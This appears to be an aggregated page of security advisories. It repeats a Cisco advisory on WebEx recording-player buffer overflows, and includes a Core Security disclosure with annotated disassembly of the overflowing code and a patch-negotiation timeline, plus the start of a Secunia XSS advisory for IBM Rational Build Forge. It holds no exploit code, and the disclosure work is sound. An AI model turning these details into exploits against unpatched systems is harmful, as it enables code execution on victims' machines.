customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. These vulnerabilities were either found during internal testing or reported to Cisco by a variety of sources, including Core Security, TippingPoint, and Fortinet's FortiGuard Labs. Cisco would like to thank these organizations for reporting these vulnerabilities. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2011-Feb-01 | public | | | | release. | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.14 (Darwin) iF4EAREIAAYFAk1IQjoACgkQQXnnBKKRMNCpdQEAg/vWtP38VKH2ZDeL9QMQfx6E M8nIZdeL2XGonJpT60IA/0APzTbZPE+9rWTi1Z0lJqIgCjHls3jo+sGQWSPvxxkS =Ur/Y -----END PGP SIGNATURE-----

Multiple buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .wrf or (2) .arf file, a different vulnerability than CVE-2010-3041, CVE-2010-3043, and CVE-2010-3044. Cisco WebEx is prone to multiple remote buffer-overflow vulnerabilities because it fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition. The Cisco WebEx Players are applications that are used to play back WebEx meeting recordings that have been recorded on the computer of an on-line meeting attendee. The players can be automatically installed when the user accesses a recording file that is hosted on a WebEx server. The player can also be manually installed for offline playback after downloading the application from www.webex.com If the WebEx recording player was automatically installed, it will be automatically upgraded to the latest, non-vulnerable version when users access a recording file that is hosted on a WebEx server. If the WebEx recording player was manually installed, users will need to manually install a new version of the player after downloading the latest version from www.webex.com Cisco has released free software updates that address these vulnerabilities. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml. Affected Products ================= Vulnerable Products +------------------ The vulnerabilities disclosed in this advisory affect the Cisco WebEx recording players. Microsoft Windows, Apple Mac OS X, and Linux versions of the player are all affected. Affected versions of the players are those prior to client builds T27LC SP22 and T27LB SP21 EP3. Customers who have contractual agreements that prevent WebEx from automatically upgrading a recording player to the latest version should contact their account manager to determine upgrade options. To determine whether a Cisco WebEx server is running an affected version of the WebEx client build, users can log in to their Cisco WebEx server and go to the Support > Downloads section. The version of the WebEx client build will be displayed on the right side of the page under "About Support Center." See "Software Versions and Fixes" for details. Cisco recommends that users upgrade to the most current version of the player that is available from www.webex.com/downloadplayer.html Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= The WebEx meeting service is a hosted multimedia conferencing solution that is managed and maintained by Cisco WebEx. The WRF and ARF file formats are used to store WebEx meeting recordings that have been recorded on the computer of an on-line meeting attendee. The players are applications that are used to play back and edit recording files (files with .wrf and .arf extensions). The recording players can be automatically installed when the user accesses a recording file that is hosted on a WebEx server (for stream playback mode). The recording players can also be manually installed after downloading the application from www.webex.com/downloadplayer.html to play back recording files locally (for offline playback mode). Multiple buffer overflow vulnerabilities exist in the WRF and ARF players. The vulnerabilities may lead to a crash of the player application or, in some cases, remote code execution could occur. To exploit one of these vulnerabilities, the player application would need to open a malicious WRF or ARF file. An attacker may be able to accomplish this exploit by providing the malicious recording file directly to users (for example, by using e-mail) or by directing a user to a malicious web page. The vulnerability cannot be triggered by users who are attending a WebEx meeting. These vulnerabilities have been assigned the following Common Vulnerabilities and Exposures (CVE) identifiers: * CVE-2010-3269 * CVE-2010-3041 * CVE-2010-3042 * CVE-2010-3043 * CVE-2010-3044 Vulnerability Scoring Details Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * Multiple Cisco WebEx Player Buffer Overflow Vulnerabilities CVSS Base Score - 9.3 Access Vector - Network Access Complexity - Medium Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.7 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the vulnerabilities described in this document could result in a crash of the Cisco WebEx ARF Player or WRF Player application and, in some cases, allow a remote attacker to execute arbitrary code on the system with the privileges of the user who is running the recording player application. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. These vulnerabilities are first fixed in T27LC SP22 and T27LB SP21 EP3. For customers who are running T27LC SP22, the client build will be represented as 27.22SP.0.9253. The fix for customers who are running T27LB SP21 will be deployed by WebEx over the next few weeks. The client build will be determined after the software is deployed. The client build is listed in the Support > Downloads section of the WebEx page after a user authenticates. WebEx bug fixes are cumulative in a major release. For example, if release 27.22SP.0 is fixed, release 27.22SP.1 will also have the software fix. If a recording player was automatically installed, it will be automatically upgraded to the latest, nonvulnerable version when users access a recording file that is hosted on a WebEx server. If a WebEx recording player was manually installed, users will need to manually install a new version of the player after downloading the latest version from www.webex.com/downloadplayer.html Workarounds =========== There are no workarounds for the vulnerabilities disclosed in this advisory. Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. These vulnerabilities were either found during internal testing or reported to Cisco by a variety of sources, including Core Security, TippingPoint, and Fortinet's FortiGuard Labs. Cisco would like to thank these organizations for reporting these vulnerabilities. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2011-Feb-01 | public | | | | release. | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.14 (Darwin) iF4EAREIAAYFAk1IQjoACgkQQXnnBKKRMNCpdQEAg/vWtP38VKH2ZDeL9QMQfx6E M8nIZdeL2XGonJpT60IA/0APzTbZPE+9rWTi1Z0lJqIgCjHls3jo+sGQWSPvxxkS =Ur/Y -----END PGP SIGNATURE-----

Multiple buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .wrf or (2) .arf file, a different vulnerability than CVE-2010-3041, CVE-2010-3042, and CVE-2010-3044. Cisco WebEx is prone to multiple remote buffer-overflow vulnerabilities because it fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition. The Cisco WebEx Players are applications that are used to play back WebEx meeting recordings that have been recorded on the computer of an on-line meeting attendee. The players can be automatically installed when the user accesses a recording file that is hosted on a WebEx server. The player can also be manually installed for offline playback after downloading the application from www.webex.com If the WebEx recording player was automatically installed, it will be automatically upgraded to the latest, non-vulnerable version when users access a recording file that is hosted on a WebEx server. If the WebEx recording player was manually installed, users will need to manually install a new version of the player after downloading the latest version from www.webex.com Cisco has released free software updates that address these vulnerabilities. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml. Affected Products ================= Vulnerable Products +------------------ The vulnerabilities disclosed in this advisory affect the Cisco WebEx recording players. Microsoft Windows, Apple Mac OS X, and Linux versions of the player are all affected. Affected versions of the players are those prior to client builds T27LC SP22 and T27LB SP21 EP3. Customers who have contractual agreements that prevent WebEx from automatically upgrading a recording player to the latest version should contact their account manager to determine upgrade options. To determine whether a Cisco WebEx server is running an affected version of the WebEx client build, users can log in to their Cisco WebEx server and go to the Support > Downloads section. The version of the WebEx client build will be displayed on the right side of the page under "About Support Center." See "Software Versions and Fixes" for details. Cisco recommends that users upgrade to the most current version of the player that is available from www.webex.com/downloadplayer.html Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= The WebEx meeting service is a hosted multimedia conferencing solution that is managed and maintained by Cisco WebEx. The WRF and ARF file formats are used to store WebEx meeting recordings that have been recorded on the computer of an on-line meeting attendee. The players are applications that are used to play back and edit recording files (files with .wrf and .arf extensions). The recording players can be automatically installed when the user accesses a recording file that is hosted on a WebEx server (for stream playback mode). The recording players can also be manually installed after downloading the application from www.webex.com/downloadplayer.html to play back recording files locally (for offline playback mode). Multiple buffer overflow vulnerabilities exist in the WRF and ARF players. The vulnerabilities may lead to a crash of the player application or, in some cases, remote code execution could occur. To exploit one of these vulnerabilities, the player application would need to open a malicious WRF or ARF file. An attacker may be able to accomplish this exploit by providing the malicious recording file directly to users (for example, by using e-mail) or by directing a user to a malicious web page. The vulnerability cannot be triggered by users who are attending a WebEx meeting. These vulnerabilities have been assigned the following Common Vulnerabilities and Exposures (CVE) identifiers: * CVE-2010-3269 * CVE-2010-3041 * CVE-2010-3042 * CVE-2010-3043 * CVE-2010-3044 Vulnerability Scoring Details Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * Multiple Cisco WebEx Player Buffer Overflow Vulnerabilities CVSS Base Score - 9.3 Access Vector - Network Access Complexity - Medium Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 7.7 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the vulnerabilities described in this document could result in a crash of the Cisco WebEx ARF Player or WRF Player application and, in some cases, allow a remote attacker to execute arbitrary code on the system with the privileges of the user who is running the recording player application. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. These vulnerabilities are first fixed in T27LC SP22 and T27LB SP21 EP3. For customers who are running T27LC SP22, the client build will be represented as 27.22SP.0.9253. The fix for customers who are running T27LB SP21 will be deployed by WebEx over the next few weeks. The client build will be determined after the software is deployed. The client build is listed in the Support > Downloads section of the WebEx page after a user authenticates. WebEx bug fixes are cumulative in a major release. For example, if release 27.22SP.0 is fixed, release 27.22SP.1 will also have the software fix. If a recording player was automatically installed, it will be automatically upgraded to the latest, nonvulnerable version when users access a recording file that is hosted on a WebEx server. If a WebEx recording player was manually installed, users will need to manually install a new version of the player after downloading the latest version from www.webex.com/downloadplayer.html Workarounds =========== There are no workarounds for the vulnerabilities disclosed in this advisory. Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. These vulnerabilities were either found during internal testing or reported to Cisco by a variety of sources, including Core Security, TippingPoint, and Fortinet's FortiGuard Labs. Cisco would like to thank these organizations for reporting these vulnerabilities. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2011-Feb-01 | public | | | | release. | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.14 (Darwin) iF4EAREIAAYFAk1IQjoACgkQQXnnBKKRMNCpdQEAg/vWtP38VKH2ZDeL9QMQfx6E M8nIZdeL2XGonJpT60IA/0APzTbZPE+9rWTi1Z0lJqIgCjHls3jo+sGQWSPvxxkS =Ur/Y -----END PGP SIGNATURE-----

Stack-based buffer overflow in Cisco WebEx Meeting Center T27LB before SP21 EP3 and T27LC before SP22 allows user-assisted remote authenticated users to execute arbitrary code by providing a crafted .atp file and then disconnecting from a meeting. NOTE: since this is a site-specific issue with no expected action for consumers, it might be REJECTed. Since this site has been identified, no general user action is required. Cisco WebEx is a web conferencing solution. There is a stack overflow in the .atp file format provided by Cisco WebEx. The function pointers in the stack can be overwritten, and the DEP and ASLR are disabled, resulting in very stable use of the code. Cisco WebEx is prone to a remote code-execution vulnerability because the application fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code with the privileges of the affected application. Failed exploit attempts will result in a denial-of-service condition. WebEx is the world's largest provider of network communication services, providing carrier-class network conferencing solutions. Currently WebEx has been acquired by Cisco. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - Corelabs Advisory http://corelabs.coresecurity.com/ Cisco WebEx .atp and .wrf Overflow Vulnerabilities 1. *Advisory Information* Title: Cisco WebEx .atp and .wrf Overflow Vulnerabilities Advisory ID: CORE-2010-1001 Advisory URL: [http://www.coresecurity.com/content/webex-atp-and-wrf-overflow-vulnerabilities] Date published: 2011-01-31 Date of last update: 2011-01-31 Vendors contacted: Cisco Release mode: Coordinated release 2. *Vulnerability Description* There are stack overflows on WebEx [1] that can be exploited by sending maliciously crafted .atp and .wrf files to a vulnerable WebEx user. When opened, these files trigger a reliably exploitable stack based buffer overflow. In the .atp case an exception handler can be overwritten on the stack, and most registers can be trivially overwritten. 4. *Vulnerable packages* . Contact Cisco for a list of vulnerable versions. 5. *Non-vulnerable packages* . Contact Cisco. 6. *Vendor Information, Solutions and Workarounds* All clients of WebEx Meeting Center should now be running a patched version according to Cisco. A non-vulnerable version of WebEx Player should be available at [http://www.webex.com/downloadplayer.html]. 7. *Credits* These vulnerabilities were discovered and researched by Federico Muttis, Sebastian Tello and Manuel Muradas from Core Security Technologies during Bugweek 2010 as part of the "Cisco Baby Cisco!" team [2]. The publication of this advisory was coordinated by Pedro Varangot. 8. *Technical Description* 8.1. *WebEx Player .wrf Buffer Overflow [CVE-2010-3269]* WebEx Player can be used to playback recordings of WebEx sessions. These recordings can be stored using the .wrf closed and undocumented file format. This vulnerability can also be exploited by publishing a .wrf video file in a meeting, resulting in the compromise of the meeting's participants. /----- .text:6070C272 loc_6070C272: ; CODE XREF: sub_6070C050+255j .text:6070C272 test esi, esi .text:6070C274 jnz short loc_6070C28F .text:6070C276 push ebx .text:6070C277 call dword ptr [ebp+0Ch] ; call to function pointer on the stack .text:6070C27A add esp, 4 .text:6070C27D test al, al .text:6070C27F jz loc_6070C374 .text:6070C285 mov edi, [ebp+0] .text:6070C288 mov esi, [ebp+4] .text:6070C28B mov eax, [esp+0D98h+var_D80] .text:6070C28F .text:6070C28F loc_6070C28F: ; CODE XREF: sub_6070C050+224j .text:6070C28F mov cl, [edi] ; cl can be controlled, it is read from the malicious .wrf file .text:6070C291 dec esi .text:6070C292 mov [esp+eax+0D98h+var_C8C], cl ; this mov overflows the stack with user controlled values .text:6070C299 mov ecx, [esp+0D98h+var_D84] .text:6070C29D inc edi .text:6070C29E inc eax .text:6070C29F cmp eax, ecx .text:6070C2A1 mov [esp+0D98h+var_D80], eax .text:6070C2A5 jl short loc_6070C272 - -----/ 8.2. If his connection to the server is then severed by a malicious payload, the .atp file will be cycled to the next connected client. We developed trivial examples that take control of EIP using arbitrary characters. 9. *Report Timeline* . 2010-10-04: Core Security Technologies contacts Cisco PSIRT using their provided PGP key notifying them of the vulnerabilities and sending an advisory draft, a proof of concept for the WebEx Player vulnerability, and a proof of concept for the Meeting Center vulnerability including details of how to reproduce both vulnerabilities, and details about the behaviour of the PoC for the Player vulnerability on Windows XP SP2 (which overwrites EIP with 0x41414141 on that platform). October 18th 2010 (a two weeks timeframe) is set as a potential release date for the advisory. 2010-10-05: Cisco PSIRT contacts Core stating that their development team is out of the office till Friday October 8th. November 15th 2010 is mentioned as an estimated release date for a fix. 2010-10-05: Core replies to Cisco PSIRT postponing the release date of this advisory for one week, to Monday October 25th, in order to contemplate the fact that Cisco's development team is away from office for the week. Further changes to the release date will be made after receiving technical feedback. November the 15th is mentioned to be a possible date to settle on. 2010-10-11: Cisco PSIRT replies acknowledging "an exception in WebEx player" but that doesn't overwrite EIP as Core Security Technologies indicated. Cisco PSIRT also asks for more detailed information about the version of WebEx Player used. 2010-10-12: Core sends the requested information, also attaching new proof of concept exploits for the WebEx Player vulnerability (that now executes code and launches "calc.exe"), and further details about the steps needed to reproduce the WebEx Meeting Center crash. Details about the system where the proof of concept for the WebEx Player vulnerability was run are asked. Details about the "exception" are also asked, specially noting that if other registers are overwritten this should be considered as a vulnerability that would possibly lead to reliable code execution even if EIP was not modified (as noted by Core on the e-mail where the PoC was attached). No reply is received to this e-mail. 2010-10-19: Core resends the previous e-mail asking for news about reproduction of the vulnerability on Cisco's side and asking if there was any problem in the reception or interpretation of the last communication. No reply is received to this e-mail. 2010-10-28: Core Security Technologies resends the last e-mail, unilaterally rescheduling the publication of this advisory to November 8th 2010, which is closer to Cisco's initial estimation for the release of a fix. Core states its willingness to reschedule this publication date but only under firm commitment from Cisco to working seriously towards fixing this issue in a scheduled timeframe. An updated advisory draft is attached which includes an updated timeline. 2010-10-30: Cisco PSIRT replies acknowledging the vulnerability, stating that they were able to reproduce code execution results in the currently released version of WebEx, and a crash in their current development version. Cisco also states that there is not information yet from their development team about when a fix for this vulnerability will be released. 2010-11-09: Core replies offering more technical details about exploitation if they are needed, and reminding Cisco that the crash in their development version may also be exploitable even if the current proof of concept exploit only crashes it. The publication date for this advisory is rescheduled to November 22nd 2010. Core states that they will like to schedule a firm date for the release of information about this vulnerability to the public and hence would like to get more information from Cisco about the schedule for the release of a fix. 2010-11-15: Cisco states that fixed code will be deployed in mid-December, but since WebEx Meeting Center runs on a SaaS environment it takes about four or five weeks for all clients to be running the latest version of the code. 2010-12-06: Cisco contacts Core since no reply was received in the past two weeks, and clarifies that a fix will be deployed on December 15th and should be done on January 11th 2011. 2010-12-06: Core states that they believe this advisory should be released as soon as the fix is deployed, since diffing the WebEx binary on the client side gives full details about the WebEx Meeting Center vulnerability to an average skilled reverse engineer. Core schedules the publication of this advisory to December 15th 2010. 2010-12-07: Cisco contacts Core stating that releasing details about this vulnerability would endanger customers, since there is no action they can take to protect themselves because the responsibility of upgrading the code ran by the customer falls on Cisco. Cisco mentions that "many of these customers are probably shared between Cisco and Core Security". 2010-12-10: Cisco contacts Core stating that they have just discovered the WebEx Meeting Center Vulnerability affects a new set of customers that where not accounted for originally. These are customers running T27SP21 that can not be upgraded to SP22. An emergency patch will be released for SP21 in January 2011, and this sets back the date when all clients should be running an updated version to the "end of January, beginning of February." . 2010-12-14: Core proposes to split this advisory into two different advisories to better accommodate the WebEx Meeting Center SaaS release cycle. On one advisory, the .wrf client side vulnerability would be described, and the other would be dedicated to the WebEx Meeting Center vulnerability that may compromise a meeting's host computer. Core believes this mitigates the risk in a more effective way, since clients can update WebEx Player by themselves on December 15th (the date when Cisco stated the fixed version would be released) and no details of the Meeting Center vulnerability would be released until all clients are running an updated version. 2010-12-15: Cisco states they wouldn't like the advisory to be splitted, and that they prefer Core Security Technologies to go ahead and release information about both vulnerabilities. 2010-12-15: Core states that they prefer to release two advisories because these are two different bugs, in two pieces of software, each one of them with a differently working update channel determined by the vendor. Core also informs Cisco that the download link for WebEx Player points to a vulnerable version as of today, and asks Cisco to clarify what date they meant as mid-December, since Core would like to know when a fixed version of WebEx Player will be available for download to be able to publish the WebEx Player vulnerability. 2010-12-16: Cisco replies saying that releasing two advisories seems like a good plan to them. Cisco also states that since many of their customers observe a lockdown policy during the holidays season, they take a "don't upgrade" policy of their own until Monday January 10th, 2011. That is the reason why the download link of WebEx Player has not been changed yet. 2011-01-10: Core states that they are ready to release this advisory on January 11th, and that releasing two separate advisories seems pointless now because the release date of both would be very similar, and the original idea was to mitigate the risk posed by the .wrf vulnerability. Core also states that they are reviewing the best course of action to take with the issue regarding clients running the old version of WebEx (T27SP21) that according to Cisco are unable to upgrade to SP22 since this was not accounted for previously. 2011-01-13: Core states that since they have committed previously to release the advisory taking into account Cisco's consideration about their SaaS patch deploy model, when factoring the issue of clients running the SP21 version of Meeting Center scheduled by Cisco for emergency update on January, a release date of January the 31st seems reasonable. This date should be taken as final and Core Security Technologies believes it takes into account all information given by Cisco about SaaS updating timeframes. If this is not the case Cisco is asked to rectify ASAP. 2011-01-14: Cisco confirms that the timeframe (publishing both vulnerabilities on January 31st) works for them. 2011-01-31: The advisory CORE-2010-1001 is published. 10. *References* [1] [http://www.webex.com/] [2] [http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=project&name=Bugweek] 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: [http://corelabs.coresecurity.com]. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at [http://www.coresecurity.com]. 13. *Disclaimer* The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/] 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at [http://www.coresecurity.com/files/attachments/core_security_advisories.asc]. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAk1HJwcACgkQyNibggitWa13VwCfVg6jVkuv3PhqmhNqZFIQO7CB L1YAni1ONdRqEYczbkvki9r0Y7nr9cIQ =9HdA -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Cross-site scripting (XSS) vulnerability in the UI in IBM Rational Build Forge 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the mod parameter to the fullcontrol program. NOTE: some of these details are obtained from third party information. IBM Rational Build Forge is an automated process execution software that helps customers build, test and publish automated software. Part of the input passed to fullcontrol/ is not properly filtered before returning to the user, and the attacker can exploit the vulnerability for arbitrary HTML and script code attacks to obtain sensitive information or hijack the target user session. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: IBM Rational Build Forge Cross-Site Scripting Vulnerability SECUNIA ADVISORY ID: SA43180 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43180/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43180 RELEASE DATE: 2011-02-04 DISCUSS ADVISORY: http://secunia.com/advisories/43180/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * 